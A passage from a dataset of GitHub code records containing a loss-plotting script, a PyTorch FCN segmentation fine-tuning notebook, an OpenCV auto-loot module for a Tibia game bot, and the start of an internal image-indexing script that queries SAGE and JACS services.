tmpV = np.load(open(nameV, 'rb'))\n M[i, :] = tmpM\n V[i, :] = tmpV\n\n\n#font = {'family' : 'normal', 'size' : 22}\n#matplotlib.rc('font', **font)\n\n\nplt.figure(figsize=(6,4.5)) \nfor k in range(len(scheme_list)):\n data_X = np.array(range(n_round))\n data_Y = M[k,:]\n data_V = 10*V[k,:]\n #markers_Y = data_Y[markers_on]\n plt.plot(data_X, data_Y, color=markers_color[k], marker=markers_shape[k], markevery=10+k) #label='_nolegend_'\n #plt.plot(data_X[markers_on], markers_Y, color=markers_color[k], marker=markers_shape[k], linestyle='None', markersize=11)\n \n #plt.fill_between(data_X, data_Y - data_V, data_Y + data_V, color=markers_color[k], alpha=0.3, lw=0)\n #plt.ylim(Lim[i][0], Lim[i][1])\nplt.legend(scheme_names)\n#t = [0, 20, 40, 60, 80, 100]\nt = [0, 10, 20, 30, 40, 50, 60, 70, 
80, 90 ,100]\nplt.xticks(t,t)\n#plt.xticks(np.arange(0,60,10))\n#plt.xticks(fontsize=16, rotation=0)\nplt.xlabel('round')\nplt.ylabel('average loss')\n#plt.ylim(0.04,0.1)\nfilename=dataset+\"_N\" + str(N) + \"_R\" + str(n_round) + \"_K\" + str(K) + \".png\"\nplt.savefig(filename, bbox_inches = \"tight\")\n\n\n\n\n", "repo_name": "bahh723/fedres", "sub_path": "goto_plot.py", "file_name": "goto_plot.py", "file_ext": "py", "file_size_in_byte": 2560, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}]} +{"seq_id": "28989531328", "text": "# %% [markdown]\n# ### This notebook is optionally accelerated with a GPU runtime.\n# ### If you would like to use this acceleration, please select the menu option \"Runtime\" -> \"Change runtime type\", select \"Hardware Accelerator\" -> \"GPU\" and click \"SAVE\"\n# \n# ----------------------------------------------------------------------\n# \n# # FCN\n# \n# *Author: Pytorch Team*\n# \n# **Fully-Convolutional Network model with ResNet-50 and ResNet-101 backbones**\n# \n# _ | _\n# - | -\n# ![alt](https://pytorch.org/assets/images/deeplab1.png) | ![alt](https://pytorch.org/assets/images/fcn2.png)\n\n# %%\nimport torch\nimport torchvision\nimport torchvision.transforms as transforms\nmodel = torch.hub.load('pytorch/vision:v0.10.0', 'fcn_resnet50', pretrained=True)\n# or\n# model = torch.hub.load('pytorch/vision:v0.10.0', 'fcn_resnet101', pretrained=True)\nmodel.eval()\n\n# %% [markdown]\n# All pre-trained models expect input images normalized in the same way,\n# i.e. 
mini-batches of 3-channel RGB images of shape `(N, 3, H, W)`, where `N` is the number of images, `H` and `W` are expected to be at least `224` pixels.\n# The images have to be loaded in to a range of `[0, 1]` and then normalized using `mean = [0.485, 0.456, 0.406]`\n# and `std = [0.229, 0.224, 0.225]`.\n# \n# The model returns an `OrderedDict` with two Tensors that are of the same height and width as the input Tensor, but with 21 classes.\n# `output['out']` contains the semantic masks, and `output['aux']` contains the auxillary loss values per-pixel. In inference mode, `output['aux']` is not useful.\n# So, `output['out']` is of shape `(N, 21, H, W)`. More documentation can be found [here](https://pytorch.org/vision/stable/models.html#object-detection-instance-segmentation-and-person-keypoint-detection).\n\n# %%\n# Download an example image from the pytorch website\n\"\"\"\nimport urllib\nurl, filename = (\"https://github.com/pytorch/hub/raw/master/images/deeplab1.png\", \"deeplab1.png\")\ntry: urllib.URLopener().retrieve(url, filename)\nexcept: urllib.request.urlretrieve(url, filename)\n\"\"\"\n\n# Select an image from the dataset\nfrom torch.utils.data import DataLoader\nfrom generate_training_validation_data import CustomImageDataset\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ntrain_data_dir = 'D:/MemeMachine_ProjectData/dataset/training'\nvalidation_data_dir = 'D:/MemeMachine_ProjectData/dataset/validation'\nimg_width, img_height, n_channels = 257, 257, 3 #TODO change dimensions to be wider, to better support text\n\nepochs = 1 #50 TODO\nbatch_size = 1\n\n#TODO change image_with_text_functions.generate_text_on_image_and_pixel_mask_from_path to place the text properly\ntrain_dataset = CustomImageDataset(train_data_dir, img_width, img_height)\ntest_dataset = CustomImageDataset(validation_data_dir, img_width, img_height)\n\ntrain_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True, )\ntest_dataloader = DataLoader(test_dataset, batch_size=batch_size, shuffle=True)\n\n# Display image and label.\ntrain_features, train_labels = next(iter(train_dataloader))\nprint(f\"Feature batch shape: {train_features.size()}\")\nprint(f\"Labels batch shape: {train_labels.size()}\")\ninput_image = train_features[0].squeeze()\ninput_image = np.moveaxis(input_image.numpy(), 0, -1)\nlabel = train_labels[0].reshape((img_width, img_height))\n\nplt.imshow(input_image, cmap=\"gray\")\nplt.show()\nplt.imshow(label, cmap=\"gray\")\nplt.show()\n\n# %%\n# sample execution (requires torchvision)\nfrom PIL import Image\nfrom torchvision import transforms\nimport cv2 as cv\n# input_image = Image.open(filename)\ninput_image2 = cv.cvtColor(input_image, cv.COLOR_BGR2RGB)\ninput_image2 = Image.fromarray(np.uint8(input_image2))\ninput_image2 = input_image2.convert(\"RGB\")\n\npreprocess = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n])\n\ninput_tensor = preprocess(input_image)\ninput_batch = input_tensor.unsqueeze(0) # create a mini-batch as expected by the model\n\n# move the input and model to GPU for speed if available\nif torch.cuda.is_available():\n input_batch = input_batch.to('cuda')\n model.to('cuda')\n\nwith torch.no_grad():\n output = model(input_batch)['out'][0] #zero refers to the batch number?\noutput_predictions = output.argmax(0)\nprint(output_predictions)\nprint(output_predictions.shape)\nprint(output)\nprint(output.shape)\n\n\n# %% [markdown]\n# The output here is of shape `(21, H, W)`, and at 
each location, there are unnormalized probabilities corresponding to the prediction of each class.\n# To get the maximum prediction of each class, and then use it for a downstream task, you can do `output_predictions = output.argmax(0)`.\n# \n# Here's a small snippet that plots the predictions, with each color being assigned to each class (see the visualized image on the left).\n\n# %%\n# create a color pallette, selecting a color for each class\npalette = torch.tensor([2 ** 25 - 1, 2 ** 15 - 1, 2 ** 21 - 1])\ncolors = torch.as_tensor([i for i in range(21)])[:, None] * palette\ncolors = (colors % 255).numpy().astype(\"uint8\")\n\n# plot the semantic segmentation predictions of 21 classes in each color\nr = Image.fromarray(output_predictions.byte().cpu().numpy()).resize(input_image2.size)\nr.putpalette(colors)\n\nimport matplotlib.pyplot as plt\nplt.imshow(r)\n# plt.show()\n\n# %% [markdown]\n# ### Model Description\n# \n# FCN-ResNet is constructed by a Fully-Convolutional Network model, using a ResNet-50 or a ResNet-101 backbone.\n# The pre-trained models have been trained on a subset of COCO train2017, on the 20 categories that are present in the Pascal VOC dataset.\n# \n# Their accuracies of the pre-trained models evaluated on COCO val2017 dataset are listed below.\n# \n# | Model structure | Mean IOU | Global Pixelwise Accuracy |\n# | --------------- | ----------- | --------------------------|\n# | fcn_resnet50 | 60.5 | 91.4 |\n# | fcn_resnet101 | 63.7 | 91.9 |\n# \n# ### Resources\n# \n# - [Fully Convolutional Networks for Semantic Segmentation](https://arxiv.org/abs/1605.06211)\n\n# %%\nimport torch.optim as optim\nimport torch.nn as nn\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.SGD(model.parameters(), lr=10**-4, momentum=0.99)\nmodel.train()\n\n# %%\n# Train the model\nfor epoch in range(2): # loop over the dataset multiple times\n\n running_loss = 0.0\n for i, data in enumerate(train_dataloader, 0):\n # get the inputs; data is a list of [inputs, labels]\n inputs, labels = data\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward + backward + optimize\n output = model(inputs)['out'][0]\n # print(output.shape)\n output = output[0]\n # print(output.shape)\n output = torch.unsqueeze(output, 0)\n output = torch.unsqueeze(output, 0)\n # print(output.shape)\n\n # output_predictions = output.argmax(0)\n # print(labels.shape)\n labels = torch.reshape(labels, (1,257,257))\n labels = labels.long()\n # print(labels.shape)\n\n loss = criterion(output, labels)\n loss.backward()\n optimizer.step()\n\n # print statistics\n running_loss += loss.item()\n if i % 2000 == 1999: # print every 2000 mini-batches\n print(f'[{epoch + 1}, {i + 1:5d}] loss: {running_loss / 2000:.3f}')\n running_loss = 0.0\n\nprint('Finished Training')\n\n# %%\ndef test(dataloader, model, loss_fn):\n size = len(dataloader.dataset)\n num_batches = len(dataloader)\n model.eval()\n test_loss, correct = 0, 0\n with torch.no_grad():\n for X, y in dataloader:\n X, y = X.to(device), y.to(device)\n pred = model(X)\n test_loss += loss_fn(pred, y).item()\n correct += (pred.argmax(1) == y).type(torch.float).sum().item()\n test_loss /= num_batches\n correct /= size\n print(f\"Test Error: \\n Accuracy: {(100*correct):>0.1f}%, Avg loss: {test_loss:>8f} \\n\")\n\n# %% [markdown]\n# Show a test of the newly trained (fine tuned) model below\n\n# %%\nmodel.eval()\n\n# Display image and label.\ntest_features, test_labels = next(iter(test_dataloader))\nprint(f\"Feature batch shape: 
{test_features.size()}\")\nprint(f\"Labels batch shape: {test_labels.size()}\")\ninput_image = test_features[0].squeeze()\ninput_image = np.moveaxis(input_image.numpy(), 0, -1)\nlabel = test_labels[0].reshape((img_width, img_height))\n\nplt.imshow(input_image, cmap=\"gray\")\nplt.show()\nplt.imshow(label, cmap=\"gray\")\nplt.show()\n\n# %%\n# input_image = Image.open(filename)\ninput_image2 = cv.cvtColor(input_image, cv.COLOR_BGR2RGB)\ninput_image2 = Image.fromarray(np.uint8(input_image2))\ninput_image2 = input_image2.convert(\"RGB\")\n\npreprocess = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n])\n\ninput_tensor = preprocess(input_image)\ninput_batch = input_tensor.unsqueeze(0) # create a mini-batch as expected by the model\n\n# move the input and model to GPU for speed if available\nif torch.cuda.is_available():\n input_batch = input_batch.to('cuda')\n model.to('cuda')\n\nwith torch.no_grad():\n output = model(input_batch)['out'][0] #zero refers to the batch number?\noutput_predictions = output.argmax(0)\nprint(output_predictions)\nprint(output_predictions.shape)\nprint(output)\nprint(output.shape)\n\n# %%\ntest(test_dataloader, model, criterion)\n\n# %%\n\n\n\n", "repo_name": "MaxNiebergall/MemeMachine", "sub_path": "TextPixelMasking/pytorch_vision_fcn_resnet101.py", "file_name": "pytorch_vision_fcn_resnet101.py", "file_ext": "py", "file_size_in_byte": 9371, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.hub.load", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.hub", "line_number": 21, "usage_type": "attribute"}, {"api_name": "generate_training_validation_data.CustomImageDataset", "line_number": 59, "usage_type": "call"}, {"api_name": "generate_training_validation_data.CustomImageDataset", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.moveaxis", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 84, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 84, "usage_type": "attribute"}, {"api_name": "PIL.Image.fromarray", "line_number": 85, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 85, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 85, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 88, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 88, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 89, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 89, "usage_type": "name"}, {"api_name": 
"torchvision.transforms.Normalize", "line_number": 90, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 90, "usage_type": "name"}, {"api_name": "torch.cuda.is_available", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 97, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.as_tensor", "line_number": 119, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 123, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 151, "usage_type": "name"}, {"api_name": "torch.optim.SGD", "line_number": 152, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 152, "usage_type": "name"}, {"api_name": "torch.unsqueeze", "line_number": 172, "usage_type": "call"}, {"api_name": "torch.unsqueeze", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 178, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 200, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 205, "usage_type": "attribute"}, {"api_name": "numpy.moveaxis", "line_number": 221, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 224, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 224, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 225, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 225, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 226, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 226, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 227, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 227, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 231, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 231, "usage_type": "attribute"}, {"api_name": "PIL.Image.fromarray", "line_number": 232, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 232, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 232, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 235, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 235, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 236, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 236, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 237, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 237, "usage_type": "name"}, {"api_name": "torch.cuda.is_available", "line_number": 244, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 244, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 248, "usage_type": "call"}]} +{"seq_id": "9798336959", "text": "import time\n\nfrom CaveBot.Player import Player\nfrom ScreenAnalizerPackage import ScreenRegion\nfrom ScreenAnalizerPackage import Position\nfrom 
ScreenAnalizerPackage import PositionError\nfrom ScreenAnalizerPackage import Coordinate\nfrom threading import Event\nfrom FilesystemPackage import Cv2File\nfrom queue import Queue\nimport numpy as np\nimport cv2\n\n\nclass AutoLoot:\n def __init__(self, player: Player, walk_event: Event, combat_event: Event):\n self.player = player\n self.walk_event = walk_event\n self.combat_event = combat_event\n\n def loot(self, frame: np.array) -> None:\n try:\n if self.walk_event.is_set() or self.combat_event.is_set():\n return\n\n position = self.player.position(frame)\n\n cv2.rectangle(frame, (position.start_x, position.start_y), (position.end_x, position.end_y), (255, 0, 0), 1)\n\n grey_scale_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n looting_area = self.__create_looting_area(position)\n\n cv2.rectangle(frame, (looting_area.start_x, looting_area.start_y), (looting_area.end_x, looting_area.end_y), (255, 0, 0), 1)\n\n roi_looting_area = grey_scale_frame[looting_area.start_y: looting_area.end_y, looting_area.start_x: looting_area.end_x]\n\n corpse_template = Cv2File.load_image('Wiki/Ui/Battle/Mobs/MountainTroll/mountain_troll_corpse.png')\n\n match = cv2.matchTemplate(roi_looting_area, corpse_template, cv2.TM_CCOEFF_NORMED)\n\n # match_locations = (y_match_coords, x_match_coords) >= similarity more than threshold\n match_locations = np.where(match >= 0.2)\n\n # paired_match_locations = [(x, y), (x, y)]\n paired_match_locations: list[tuple[int, int]] = list(zip(*match_locations[::-1]))\n\n box_to_draw = []\n\n for match_location in paired_match_locations:\n (roi_relative_start_x, roi_relative_start_y) = match_location\n\n roi_relative_end_y, roi_relative_end_x = corpse_template.shape\n\n start_x = roi_relative_start_x + looting_area.start_x\n start_y = roi_relative_start_y + looting_area.start_y\n\n end_x = start_x + roi_relative_end_x\n end_y = start_y + roi_relative_end_y\n\n box_to_draw.append((start_x, start_y, end_x, end_y))\n\n grouped_boxes, _ = cv2.groupRectangles(box_to_draw, groupThreshold=1, eps=0.1)\n\n for grouped_box in grouped_boxes:\n start_x, start_y, end_x, end_y = grouped_box\n\n cv2.rectangle(frame, (start_x, start_y), (end_x, end_y), (255, 0, 255), 1)\n\n screen_region = ScreenRegion(start_x, end_x, start_y, end_y)\n\n click_point = Coordinate.from_screen_region(screen_region)\n\n self.player.loot(click_point)\n\n time.sleep(2)\n\n self.walk_event.set()\n\n except PositionError:\n pass\n\n def __create_looting_area(self, player_position: Position) -> ScreenRegion:\n start_x = player_position.start_x - 60\n end_x = player_position.end_x + 60\n start_y = player_position.start_y - 60\n end_y = player_position.end_y + 60\n\n return ScreenRegion(start_x, end_x, start_y, end_y)", "repo_name": "Adriein/TibiaAcBot", "sub_path": "CaveBot/AutoLootLegacy.py", "file_name": "AutoLootLegacy.py", "file_ext": "py", "file_size_in_byte": 3296, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "CaveBot.Player.Player", "line_number": 16, "usage_type": "name"}, {"api_name": "threading.Event", "line_number": 16, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 30, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 34, "usage_type": "call"}, {"api_name": 
"FilesystemPackage.Cv2File.load_image", "line_number": 38, "usage_type": "call"}, {"api_name": "FilesystemPackage.Cv2File", "line_number": 38, "usage_type": "name"}, {"api_name": "cv2.matchTemplate", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.TM_CCOEFF_NORMED", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.groupRectangles", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 68, "usage_type": "call"}, {"api_name": "ScreenAnalizerPackage.ScreenRegion", "line_number": 70, "usage_type": "call"}, {"api_name": "ScreenAnalizerPackage.Coordinate.from_screen_region", "line_number": 72, "usage_type": "call"}, {"api_name": "ScreenAnalizerPackage.Coordinate", "line_number": 72, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 76, "usage_type": "call"}, {"api_name": "ScreenAnalizerPackage.PositionError", "line_number": 80, "usage_type": "name"}, {"api_name": "ScreenAnalizerPackage.Position", "line_number": 83, "usage_type": "name"}, {"api_name": "ScreenAnalizerPackage.ScreenRegion", "line_number": 89, "usage_type": "call"}, {"api_name": "ScreenAnalizerPackage.ScreenRegion", "line_number": 83, "usage_type": "name"}]} +{"seq_id": "75336980963", "text": "import argparse\nimport os\nimport subprocess\nimport sys\nimport time\nimport colorlog\nimport requests\nimport MySQLdb\nfrom pymongo import MongoClient\nfrom tqdm import tqdm\n\n\n# SQL statements\nSQL = {\n 'OVERDUE': \"SELECT i.family,ipd.value AS data_set,ips.value AS slide_code,\"\n + \"i.name,i.line FROM image_vw i JOIN image_property_vw ipd ON \"\n + \"(i.id=ipd.image_id AND ipd.type='data_set') JOIN image_property_vw ips \"\n + \"ON (i.id=ips.image_id AND ips.type='slide_code') WHERE i.family NOT \"\n + \"LIKE 'simpson%' AND i.id NOT IN (SELECT image_id FROM \"\n + \"image_property_vw WHERE type='bits_per_sample') AND \"\n + \"TIMESTAMPDIFF(HOUR,i.create_date,NOW()) > 8\",\n 'ALL': \"SELECT i.family,ipd.value AS data_set,ips.value AS slide_code,\"\n + \"i.name,i.line FROM image_vw i JOIN image_property_vw ipd ON \"\n + \"(i.id=ipd.image_id AND ipd.type='data_set') JOIN image_property_vw ips \"\n + \"ON (i.id=ips.image_id AND ips.type='slide_code') WHERE i.family NOT \"\n + \"LIKE 'simpson%' AND i.id NOT IN (SELECT image_id FROM \"\n + \"image_property_vw WHERE type='bits_per_sample')\",\n 'OVERRIDE': \"SELECT i.family,ipd.value AS data_set,ips.value AS slide_code,\"\n + \"i.name,i.line FROM image_vw i JOIN image_property_vw ipd ON \"\n + \"(i.id=ipd.image_id AND ipd.type='data_set') JOIN image_property_vw ips \"\n + \"ON (i.id=ips.image_id AND ips.type='slide_code') WHERE i.family NOT \"\n + \"LIKE 'simpson%'\",\n 'SINGLE': \"SELECT family,data_set,slide_code,name,line FROM image_data_mv WHERE \"\n + \"id=%s\",\n}\n# JACS call details\nPREFIX = {\"DISCOVER\": 'action=invokeOpByName&name=ComputeServer%3Aservice%3DSampleDataManager&&methodName=runSampleDiscovery&arg0=',\n \"PROCESS\": 'action=invokeOp&name=ComputeServer%3Aservice%3DSampleDataManager&methodIndex=18&methodName=runSampleOrFolder&arg0='}\nSUFFIX = {\"DISCOVER\": '&argType=java.lang.String\" http://jacs-data2.int.janelia.org:8180/jmx-console/HtmlAdaptor',\n \"PROCESS\": '&arg1=True&arg2=True&arg3=True&arg4=True&arg5=\" http://jacs-data3.int.janelia.org:8180/jmx-console/HtmlAdaptor'}\n# Counters\nCOUNT = {'failure': 0, 'found': 0, 'skipped': 0, 'success': 0}\nDSDICT = {}\nINDEXED = {}\nIN_FLYCORE = {}\n# Configuration\nCONFIG = 
{'config': {'url': 'http://config.int.janelia.org/'}}\nCONN = dict()\nCURSOR = dict()\n\n# -----------------------------------------------------------------------------\n\n\ndef call_responder(server, endpoint, post=''):\n url = CONFIG[server]['url'] + endpoint\n try:\n if post:\n req = requests.post(url, json=post)\n else:\n req = requests.get(url)\n except requests.exceptions.RequestException as err:\n LOGGER.critical(err)\n sys.exit(-1)\n if req.status_code in (200, 201):\n return req.json()\n if req.status_code == 404:\n return ''\n try:\n LOGGER.critical('%s: %s', str(req.status_code), req.json()['rest']['message'])\n except:\n LOGGER.critical('%s: %s', str(req.status_code), req.text)\n sys.exit(-1)\n\n\ndef sql_error(err):\n try:\n print('MySQL error [%d]: %s' % (err.args[0], err.args[1]))\n except IndexError:\n print('MySQL error: %s' % err)\n sys.exit(-1)\n\n\ndef db_connect(dbd):\n \"\"\" Connect to a database\n Keyword arguments:\n dbd: database dictionary\n Returns:\n connector and cursor\n \"\"\"\n LOGGER.info(\"Connecting to %s on %s\", dbd['name'], dbd['host'])\n try:\n conn = MySQLdb.connect(host=dbd['host'], user=dbd['user'],\n passwd=dbd['password'], db=dbd['name'])\n except MySQLdb.Error as err:\n sql_error(err)\n try:\n cursor = conn.cursor(MySQLdb.cursors.DictCursor)\n return conn, cursor\n except MySQLdb.Error as err:\n sql_error(err)\n\n\ndef connect_databases(database):\n try:\n mdb = database['jacs-mongo']['prod']['read']\n client = MongoClient(mdb['host'], replicaSet=mdb['replicaset'],\n username=mdb['user'], password=mdb['password'])\n dbm = client.jacs\n LOGGER.info(f\"Connected to {mdb['name']} on {mdb['host']} as {mdb['user']}\")\n cursor = dbm.dataSet.find({'sageGrammarPath':{'$exists':True}},\n {'_id':0, 'identifier':1, 'sageConfigPath':1,\n 'sageGrammarPath':1})\n except Exception as err:\n LOGGER.error('Could not connect to Mongo: %s' % (err))\n sys.exit(-1)\n for dset in cursor:\n DSDICT[dset['identifier']] = {'config': dset['sageConfigPath'],\n 'grammar': dset['sageGrammarPath']}\n (CONN['sage'], CURSOR['sage']) = db_connect(database['sage']['prod'])\n\n\ndef initialize_program():\n \"\"\" Initialize\n \"\"\"\n global CONFIG # pylint: disable=W0603\n data = call_responder('config', 'config/db_config')\n connect_databases(data['config'])\n data = call_responder('config', 'config/rest_services')\n CONFIG = data['config']\n\n\ndef get_entity(line, slide_code):\n sid = line + '-' + slide_code\n response = call_responder('jacs', 'data/sample?name=' + sid)\n if not response:\n LOGGER.error(\"Could not find sample ID for %s\", sid)\n return ''\n return response[0]['_id']\n\n\ndef discover_and_process(slide_code):\n for code in sorted(slide_code):\n command = 'wget -v --post-data=\"%s%s%s' % (PREFIX['DISCOVER'], code,\n SUFFIX['DISCOVER'])\n LOGGER.debug(command)\n os.system(command)\n time.sleep(3)\n entity = get_entity(slide_code[code], code)\n if entity:\n command = 'wget -v --post-data=\"%s%s%s' % (PREFIX['PROCESS'], entity,\n SUFFIX['PROCESS'])\n LOGGER.debug(command)\n os.system(command)\n\n\ndef in_flycore(line):\n if line in IN_FLYCORE:\n return IN_FLYCORE[line]\n if '_IS' in line or '_IL' in line:\n IN_FLYCORE[line] = True\n return True\n response = call_responder(\"flycore\", \"?request=linedata;line=\" + line)\n if not response['linedata']:\n IN_FLYCORE[line] = False\n else:\n IN_FLYCORE[line] = True\n return IN_FLYCORE[line]\n\n\ndef process_images():\n mode = 'ALL' if ARG.ALL else 'OVERDUE'\n if ARG.OVERRIDE:\n mode = 'OVERRIDE'\n stmt = SQL[mode]\n 
if ARG.SLIDE:\n addition = '%' + ARG.SLIDE + '%'\n stmt = stmt.replace(\"sample')\",\n \"sample') AND ips.value LIKE '\" + addition + \"'\")\n if ARG.DATASET:\n addition = '%' + ARG.DATASET + '%'\n stmt = stmt.replace(\"sample')\",\n \"sample') AND ipd.value LIKE '\" + addition + \"'\")\n if ARG.OVERRIDE:\n stmt += \" AND ips.value LIKE '\" + addition + \"'\"\n rows = list()\n if ARG.IDS:\n idfile = open(ARG.IDS, \"r\")\n for line in idfile:\n line = line.rstrip()\n try:\n CURSOR['sage'].execute(SQL['SINGLE'], (line, ))\n row = CURSOR['sage'].fetchone()\n rows.append(row)\n except MySQLdb.Error as err:\n sql_error(err)\n idfile.close()\n else:\n try:\n LOGGER.debug(stmt)\n CURSOR['sage'].execute(stmt)\n rows = CURSOR['sage'].fetchall()\n except MySQLdb.Error as err:\n sql_error(err)\n\n lsm = dict()\n slide_code = dict()\n if ARG.TEST:\n LOGGER.warning(\"Test mode: will not send transactions\")\n for row in tqdm(rows):\n config = ''\n grammar = ''\n COUNT['found'] += 1\n LOGGER.info(\"%s\\t%s\\t%s\\t%s\", row['family'], row['data_set'],\n row['slide_code'], row['name'])\n if not in_flycore(row['line']):\n LOGGER.error(\"Line %s is not in FlyCore\", row['line'])\n continue\n if row['family'] == 'rubin_chacrm':\n config = '/groups/scicompsoft/informatics/data/rubin_light_imagery-config.xml'\n grammar = '/misc/sc/pipeline/grammar/chacrm_sage.gra'\n elif row['data_set'] in DSDICT:\n config = DSDICT[row['data_set']]['config']\n grammar = DSDICT[row['data_set']]['grammar']\n grammar = grammar.replace(\"/misc/local/pipeline\", \"/misc/sc/pipeline\")\n else:\n LOGGER.error('Could not determine configuration and grammar '\n + 'for data set %s', row['data_set'])\n lsm.setdefault(row['data_set'], []).append(row['name'])\n if config and grammar and ARG.INDEX:\n slide_code[row['slide_code']] = row['line']\n index_image(config, grammar, row['name'], row['data_set'])\n operation = 'indexed'\n if not (ARG.INDEX or ARG.DISCOVER):\n operation = 'indexed/discovered'\n for dataset, lsmlist in 